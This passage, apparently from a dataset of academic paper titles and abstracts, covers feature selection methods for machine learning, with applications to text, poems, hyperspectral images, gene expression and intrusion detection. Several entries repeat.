for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: An Introduction to Variable and Feature Selection paper_content: Variable and feature selection have become the focus of much research in areas of application for which datasets with tens or hundreds of thousands of variables are available. These areas include text processing of internet documents, gene expression array analysis, and combinatorial chemistry. The objective of variable selection is three-fold: improving the prediction performance of the predictors, providing faster and more cost-effective predictors, and providing a better understanding of the underlying process that generated the data. The contributions of this special issue cover a wide range of aspects of such problems: providing a better definition of the objective function, feature construction, feature ranking, multivariate feature selection, efficient search methods, and feature validity assessment methods. --- paper_title: Greedy Attribute Selection paper_content: Abstract Many real-world domains bless us with a wealth of attributes to use for learning. This blessing is often a curse: most inductive methods generalize worse given too many attributes than if given a good subset of those attributes. We examine this problem for two learning tasks taken from a calendar scheduling domain. We show that ID3/C4.5 generalizes poorly on these tasks if allowed to use all available attributes. We examine five greedy hillclimbing procedures that search for attribute sets that generalize well with ID3/C4.5. Experiments suggest hillclimbing in attribute space can yield substantial improvements in generalization performance. We present a caching scheme that makes attribute hillclimbing more practical computationally. We also compare the results of hillclimbing in attribute space with FOCUS and RELIEF on the two tasks. --- paper_title: Selection of relevant features and examples in machine learning paper_content: Abstract In this survey, we review work in machine learning on methods for handling data sets containing large amounts of irrelevant information. We focus on two key issues: the problem of selecting relevant features, and the problem of selecting relevant examples. We describe the advances that have been made on these topics in both empirical and theoretical work in machine learning, and we present a general framework that we use to compare different methods. We close with some challenges for future work in this area. --- paper_title: Wrappers for feature subset selection paper_content: Abstract In the feature subset selection problem, a learning algorithm is faced with the problem of selecting a relevant subset of features upon which to focus its attention, while ignoring the rest. To achieve the best possible performance with a particular learning algorithm on a particular training set, a feature subset selection method should consider how the algorithm and the training set interact. We explore the relation between optimal feature subset selection and relevance. Our wrapper method searches for an optimal feature subset tailored to a particular algorithm and a domain. We study the strengths and weaknesses of the wrapper approach and show a series of improved designs. We compare the wrapper approach to induction without feature subset selection and to Relief, a filter approach to feature subset selection. Significant improvement in accuracy is achieved for some datasets for the two families of induction algorithms used: decision trees and Naive-Bayes. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2 704 156 subsets. --- paper_title: Toward Optimal Feature Selection paper_content: In this paper, we examine a method for feature subset selection based on Information Theory. Initially, a framework for defining the theoretically optimal, but computationally intractable, method for feature subset selection is presented. We show that our goal should be to eliminate a feature if it gives us little or no additional information beyond that subsumed by the remaining features. In particular, this will be the case for both irrelevant and redundant features. We then give an efficient algorithm for feature selection which computes an approximation to the optimal feature selection criterion. The conditions under which the approximate algorithm is successful are examined. Empirical results are given on a number of data sets, showing that the algorithm effectively handles datasets with a very large number of features. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Correlation-based Feature Selection for Machine Learning paper_content: A central problem in machine learning is identifying a representative set of features from which to construct a classification model for a particular task. This thesis addresses the problem of feature selection for machine learning through a correlation based approach. The central hypothesis is that good feature sets contain features that are highly correlated with the class, yet uncorrelated with each other. A feature evaluation formula, based on ideas from test theory, provides an operational definition of this hypothesis. CFS (Correlation based Feature Selection) is an algorithm that couples this evaluation formula with an appropriate correlation measure and a heuristic search strategy. CFS was evaluated by experiments on artificial and natural datasets. Three machine learning algorithms were used: C4.5 (a decision tree learner), IB1 (an instance based learner), and naive Bayes. Experiments on artificial datasets showed that CFS quickly identifies and screens irrelevant, redundant, and noisy features, and identifies relevant features as long as their relevance does not strongly depend on other features. On natural domains, CFS typically eliminated well over half the features. In most cases, classification accuracy using the reduced feature set equaled or bettered accuracy using the complete feature set. Feature selection degraded machine learning performance in cases where some features were eliminated which were highly predictive of very small areas of the instance space. Further experiments compared CFS with a wrapper—a well known approach to feature selection that employs the target learning algorithm to evaluate feature sets. In many cases CFS gave comparable results to the wrapper, and in general, outperformed the wrapper on small datasets. CFS executes many times faster than the wrapper, which allows it to scale to larger datasets. Two methods of extending CFS to handle feature interaction are presented and experimentally evaluated. The first considers pairs of features and the second incorporates iii feature weights calculated by the RELIEF algorithm. Experiments on artificial domains showed that both methods were able to identify interacting features. On natural domains, the pairwise method gave more reliable results than using weights provided by RELIEF. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: Correlation-based Feature Selection for Discrete and Numeric Class Machine Learning paper_content: Algorithms for feature selection fall into two broad categories: wrappers that use the learning algorithm itself to evaluate the usefulness of features and filters that evaluate features according to heuristics based on general characteristics of the data. For application to large databases, filters have proven to be more practical than wrappers because they are much faster. However, most existing filter algorithms only work with discrete classification problems. This paper describes a fast, correlation-based filter algorithm that can be applied to continuous and discrete problems. The algorithm often outperforms the well-known ReliefF attribute estimator when used as a preprocessing step for naive Bayes, instance-based learning, decision trees, locally weighted regression, and model trees. It performs more feature selection than ReliefF does—reducing the data dimensionality by fifty percent in most cases. Also, decision and model trees built from the preprocessed data are often significantly smaller. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Movie Popularity Classification based on Inherent Movie Attributes using C4.5,PART and Correlation Coefficient paper_content: Abundance of movie data across the internet makes it an obvious candidate for machine learning and knowledge discovery. But most researches are directed towards bi-polar classification of movie or generation of a movie recommendation system based on reviews given by viewers on various internet sites. Classification of movie popularity based solely on attributes of a movie i.e. actor, actress, director rating, language, country and budget etc. has been less highlighted due to large number of attributes that are associated with each movie and their differences in dimensions. In this paper, we propose classification scheme of pre-release movie popularity based on inherent attributes using C4.5 and PART classifier algorithm and define the relation between attributes of post release movies using correlation coefficient. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: The feature selection problem: traditional methods and a new algorithm paper_content: For real-world concept learning problems, feature selection is important to speed up learning and to improve concept quality. We review and analyze past approaches to feature selection and note their strengths and weaknesses. We then introduce and theoretically examine a new algorithm Rellef which selects relevant features using a statistical method. Relief does not depend on heuristics, is accurate even if features interact, and is noise-tolerant. It requires only linear time in the number of given features and the number of training instances, regardless of the target concept complexity. The algorithm also has certain limitations such as nonoptimal feature set size. Ways to overcome the limitations are suggested. We also report the test results of comparison between Relief and other feature selection algorithms. The empirical results support the theoretical analysis, suggesting a practical approach to feature selection for real-world problems. --- paper_title: Learning With Many Irrelevant Features paper_content: In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires Θ(1/e ln 1/δ+ 1/e[2p + p ln n]) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. The paper also presents a quasi-polynomial time algorithm, FOCUS, which implements MIN-FEATURES. Experimental studies are presented that compare FOCUS to the ID3 and FRINGE algorithms. These experiments show that-- contrary to expectations--these algorithms do not implement good approximations of MIN-FEATURES. The coverage, sample complexity, and generalization performance of FOCUS is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. This suggests that, in practical applications, training data should be preprocessed to remove irrelevant features before being given to ID3 or FRINGE. --- paper_title: A Monotonic Measure for Optimal Feature Selection paper_content: Feature selection is a problem of choosing a subset of relevant features. In general, only exhaustive search can bring about the optimal subset. With a monotonic measure, exhaustive search can be avoided without sacrificing optimality. Unfortunately, most error- or distancebased measures are not monotonic. A new measure is employed in this work that is monotonic and fast to compute. The search for relevant features according to this measure is guaranteed to be complete but not exhaustive. Experiments are conducted for verification. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet. Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Multi-view Ensemble Learning for Poem Data Classification Using SentiWordNet paper_content: Poem is a piece of writing in which the expression of feeling and ideas is given intensity by particular attention to diction, rhythm and imagery [1]. In this modern age, the poem collection is ever increasing on the internet. Therefore, to classify poem correctly is an important task. Sentiment information of the poem is useful to enhance the classification task. SentiWordNet is an opinion lexicon. To each term are assigned two numeric scores indicating positive and negative sentiment information. Multiple views of the poem data may be utilized for learning to enhance the classification task. In this research, the effect of sentiment information has been explored for poem data classification using Multi-view ensemble learning. The experiments include the use of Support Vector Machine (SVM) for learning classifier corresponding to each view of the data. --- paper_title: Stability of feature selection algorithms: a study on high-dimensional spaces paper_content: With the proliferation of extremely high-dimensional data, feature selection algorithms have become indispensable components of the learning process. Strangely, despite extensive work on the stability of learning algorithms, the stability of feature selection algorithms has been relatively neglected. This study is an attempt to fill that gap by quantifying the sensitivity of feature selection algorithms to variations in the training set. We assess the stability of feature selection algorithms based on the stability of the feature preferences that they express in the form of weights-scores, ranks, or a selected feature subset. We examine a number of measures to quantify the stability of feature preferences and propose an empirical way to estimate them. We perform a series of experiments with several feature selection algorithms on a set of proteomics datasets. The experiments allow us to explore the merits of each stability measure and create stability profiles of the feature selection algorithms. Finally, we show how stability profiles can support the choice of a feature selection algorithm. --- paper_title: An effective feature selection method for hyperspectral image classification based on genetic algorithm and support vector machine paper_content: With the development and popularization of the remote-sensing imaging technology, there are more and more applications of hyperspectral image classification tasks, such as target detection and land cover investigation. It is a very challenging issue of urgent importance to select a minimal and effective subset from those mass of bands. This paper proposed a hybrid feature selection strategy based on genetic algorithm and support vector machine (GA-SVM), which formed a wrapper to search for the best combination of bands with higher classification accuracy. In addition, band grouping based on conditional mutual information between adjacent bands was utilized to counter for the high correlation between the bands and further reduced the computational cost of the genetic algorithm. During the post-processing phase, the branch and bound algorithm was employed to filter out those irrelevant band groups. Experimental results on two benchmark data sets have shown that the proposed approach is very competitive and effective. --- paper_title: Self-adaptive differential evolution for feature selection in hyperspectral image data paper_content: Hyperspectral images are captured from hundreds of narrow and contiguous bands from the visible to infrared regions of electromagnetic spectrum. Each pixel of an image is represented by a vector where the components of the vector constitute the reflectance value of the surface for each of the bands. The length of the vector is equal to the number of bands. Due to the presence of large number of bands, classification of hyperspectral images becomes computation intensive. Moreover, higher correlation among neighboring bands increases the redundancy among them. As a result, feature selection becomes very essential for reducing the dimensionality. In the proposed work, an attempt has been made to develop a supervised feature selection technique guided by evolutionary algorithms. Self-adaptive differential evolution (SADE) is used for feature subset generation. Generated subsets are evaluated using a wrapper model where fuzzy k-nearest neighbor classifier is taken into consideration. Our proposed method also uses a feature ranking technique, ReliefF algorithm, for removing duplicate features. To demonstrate the effectiveness of the proposed method, investigation is carried out on three sets of data and the results are compared with four other evolutionary based state-of-the-art feature selection techniques. The proposed method shows promising results compared to others in terms of overall classification accuracy and Kappa coefficient. --- paper_title: Band-Subset-Based Clustering and Fusion for Hyperspectral Imagery Classification paper_content: This paper proposes a band-subset-based clustering and fusion technique to improve the classification performance in hyperspectral imagery. The proposed method can account for the varying data qualities and discrimination capabilities across spectral bands, and utilize the spectral and spatial information simultaneously. First, the hyperspectral data cube is partitioned into several nearly uncorrelated subsets, and an eigenvalue-based approach is proposed to evaluate the confidence of each subset. Then, a nonparametric technique is used to extract the arbitrarily-shaped clusters in spatial-spectral domain. Each cluster offers a reference spectral, based on which a pseudosupervised hyperspectral classification scheme is developed by using evidence theory to fuse the information provided by each subset. The experimental results on real Hyperspectral Digital Imagery Collection Experiment (HYDICE) demonstrate that the proposed pseudosupervised classification scheme can achieve higher accuracy than the spatially constrained fuzzy c-means clustering method. It can achieve nearly the same accuracy as the supervised K-Nearest Neighbor (KNN) classifier but is more robust to noise. --- paper_title: Nonparametric weighted feature extraction for classification paper_content: In this paper, a new nonparametric feature extraction method is proposed for high-dimensional multiclass pattern recognition problems. It is based on a nonparametric extension of scatter matrices. There are at least two advantages to using the proposed nonparametric scatter matrices. First, they are generally of full rank. This provides the ability to specify the number of extracted features desired and to reduce the effect of the singularity problem. This is in contrast to parametric discriminant analysis, which usually only can extract L-1 (number of classes minus one) features. In a real situation, this may not be enough. Second, the nonparametric nature of scatter matrices reduces the effects of outliers and works well even for nonnormal datasets. The new method provides greater weight to samples near the expected decision boundary. This tends to provide for increased classification accuracy. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2 704 156 subsets. --- paper_title: Adaptive Intrusion Detection: A Data Mining Approach paper_content: In this paper we describe a data mining framework for constructingintrusion detection models. The first key idea is to mine system auditdata for consistent and useful patterns of program and user behavior.The other is to use the set of relevant system features presented inthe patterns to compute inductively learned classifiers that canrecognize anomalies and known intrusions. In order for the classifiersto be effective intrusion detection models, we need to have sufficientaudit data for training and also select a set of predictive systemfeatures. We propose to use the association rules and frequentepisodes computed from audit data as the basis for guiding the auditdata gathering and feature selection processes. We modify these twobasic algorithms to use axis attribute(s) and referenceattribute(s) as forms of item constraints to compute only therelevant patterns. In addition, we use an iterative level-wiseapproximate mining procedure to uncover the low frequency butimportant patterns. We use meta-learning as a mechanism to makeintrusion detection models more effective and adaptive. We report ourextensive experiments in using our framework on real-world audit data. --- paper_title: A Comparative Study of Feature Selection and Classification Methods for Gene Expression Data of Glioma paper_content: Abstract Microarray gene expression data gained great importance in recent years due to its role in disease diagnoses and prognoses which help to choose the appropriate treatment plan for patients. This technology has shifted a new era in molecular classification. Interpreting gene expression data remains a difficult problem and an active research area due to their native nature of “high dimensional low sample size”. Such problems pose great challenges to existing classification methods. Thus, effective feature selection techniques are often needed in this case to aid to correctly classify different tumor types and consequently lead to a better understanding of genetic signatures as well as improve treatment strategies. This paper aims on a comparative study of state-of-the- art feature selection methods, classification methods, and the combination of them, based on gene expression data. We compared the efficiency of three different classification methods including: support vector machines, k-nearest neighbor and random forest, and eight different feature selection methods, including: information gain, twoing rule, sum minority, max minority, gini index, sum of variances, t-statistics, and one-dimension support vector machine. Five-fold cross validation was used to evaluate the classification performance. Two publicly available gene expression data sets of glioma were used in the experiments. Results revealed the important role of feature selection in classifying gene expression data. By performing feature selection, the classification accuracy can be significantly boosted by using a small number of genes. The relationship of features selected in different feature selection methods is investigated and the most frequent features selected in each fold among all methods for both datasets are evaluated. --- paper_title: Image retrieval: Current techniques, promising directions and open issues paper_content: This paper provides a comprehensive survey of the technical achievements in the research area of image retrieval, especially content-based image retrieval, an area that has been so active and prosperous in the past few years. The survey includes 100+ papers covering the research aspects of image feature representation and extraction, multidimensional indexing, and system design, three of the fundamental bases of content-based image retrieval. Furthermore, based on the state-of-the-art technology available now and the demand from real-world applications, open research issues are identified and future promising research directions are suggested. --- paper_title: Adaptive forward-backward greedy algorithm for learning sparse representations paper_content: Consider linear prediction models where the target function is a sparse linear combination of a set of basis functions. We are interested in the problem of identifying those basis functions with non-zero coefficients and reconstructing the target function from noisy observations. Two heuristics that are widely used in practice are forward and backward greedy algorithms. First, we show that neither idea is adequate. Second, we propose a novel combination that is based on the forward greedy algorithm but takes backward steps adaptively whenever beneficial. We prove strong theoretical results showing that this procedure is effective in learning sparse representations. Experimental results support our theory. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet. Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: An extensive empirical study of feature selection metrics for text classification paper_content: Machine learning for text classification is the cornerstone of document categorization, news filtering, document routing, and personalization. In text domains, effective feature selection is essential to make the learning task efficient and more accurate. This paper presents an empirical comparison of twelve feature selection methods (e.g. Information Gain) evaluated on a benchmark of 229 text classification problem instances that were gathered from Reuters, TREC, OHSUMED, etc. The results are analyzed from multiple goal perspectives-accuracy, F-measure, precision, and recall-since each is appropriate in different situations. The results reveal that a new feature selection metric we call 'Bi-Normal Separation' (BNS), outperformed the others by a substantial margin in most situations. This margin widened in tasks with high class skew, which is rampant in text classification problems and is particularly challenging for induction algorithms. A new evaluation methodology is offered that focuses on the needs of the data mining practitioner faced with a single dataset who seeks to choose one (or a pair of) metrics that are most likely to yield the best performance. From this perspective, BNS was the top single choice for all goals except precision, for which Information Gain yielded the best result most often. This analysis also revealed, for example, that Information Gain and Chi-Squared have correlated failures, and so they work poorly together. When choosing optimal pairs of metrics for each of the four performance goals, BNS is consistently a member of the pair---e.g., for greatest recall, the pair BNS + F1-measure yielded the best performance on the greatest number of tasks by a considerable margin. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature Selection for High-Dimensional Data: A Fast Correlation-Based Filter Solution paper_content: Feature selection, as a preprocessing step to machine learning, is effective in reducing dimensionality, removing irrelevant data, increasing learning accuracy, and improving result comprehensibility. However, the recent increase of dimensionality of data poses a severe challenge to many existing feature selection methods with respect to efficiency and effectiveness. In this work, we introduce a novel concept, predominant correlation, and propose a fast filter method which can identify relevant features as well as redundancy among relevant features without pairwise correlation analysis. The efficiency and effectiveness of our method is demonstrated through extensive comparisons with other methods using real-world data of high dimensionality --- paper_title: Multi-view Ensemble Learning for Poem Data Classification Using SentiWordNet paper_content: Poem is a piece of writing in which the expression of feeling and ideas is given intensity by particular attention to diction, rhythm and imagery [1]. In this modern age, the poem collection is ever increasing on the internet. Therefore, to classify poem correctly is an important task. Sentiment information of the poem is useful to enhance the classification task. SentiWordNet is an opinion lexicon. To each term are assigned two numeric scores indicating positive and negative sentiment information. Multiple views of the poem data may be utilized for learning to enhance the classification task. In this research, the effect of sentiment information has been explored for poem data classification using Multi-view ensemble learning. The experiments include the use of Support Vector Machine (SVM) for learning classifier corresponding to each view of the data. --- paper_title: A Unifying View on Instance Selection paper_content: In this paper, we consider instance selection as an important focusing task in the data preparation phase of knowledge discovery and data mining. Focusing generally covers all issues related to data reduction. First of all, we define a broader perspective on focusing tasks, choose instance selection as one particular focusing task, and outline the specification of concrete evaluation criteria to measure success of instance selection approaches. Thereafter, we present a unifying framework that covers existing approaches towards solutions 